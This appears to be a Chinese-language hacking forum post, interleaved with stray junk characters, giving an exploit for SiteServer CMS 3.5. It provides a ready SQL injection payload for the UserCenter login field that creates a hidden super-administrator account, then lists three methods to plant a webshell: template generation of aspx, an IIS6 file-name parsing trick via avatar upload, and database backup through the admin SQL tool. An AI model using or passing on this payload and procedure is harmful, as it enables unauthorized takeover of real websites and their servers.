经测试秒杀最新的3.5版: j: c2 X& S1 b" |: I+ g9 j
stieserver官网:www.siteserver.cn6 w. i- r2 O: \4 O4 {
EXP:
4 u8 j x& j& b) k直接访问UserCenter/login.aspx% D) m9 S; s$ X4 u$ G k" k
用户名处输入:, {+ D9 Z% h" u2 [
( e' a6 j1 _$ l" z; f8 ?5 ^0 {123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
- F3 _$ k6 y/ Y: ]5 I. A: B$ k密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。: d. V# [+ K. P" T4 K
之后再访问后台SiteServer/login.aspx用插入的用户登陆- ~5 D" T& @% e1 B6 `+ _
后台拿webshell的三种方法:0 G* P* Y; X( @
一、* s% |- b/ h% t* A
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
7 p$ ^) w2 k- \3 [; c/ V: v! @二、
' P. g7 @) P# z/ B" [$ [成员权限-》添加用户-》用户名为:1.asp
" ^ c% O1 u) J; O1 c% Bhttp://127.0.0.1/usercenter/+ X5 s G o2 I% b1 E: r
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell! p! }8 e6 w( k. G
(ps:后台添加用户时不会验证是否含有非法字符)
' a5 ~0 A4 i0 q三、
% a5 h5 |8 `: U7 E( y系统工具-》实用工具-》机器参数查看* W! p1 ?: ~' I5 Z
可以看到数据库类型、名称,WEB路径
7 Y7 o! P2 q3 Z) @4 I1 d系统工具-》数据库工具-》SQL语句查询# m/ e0 h+ X6 P g* U
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |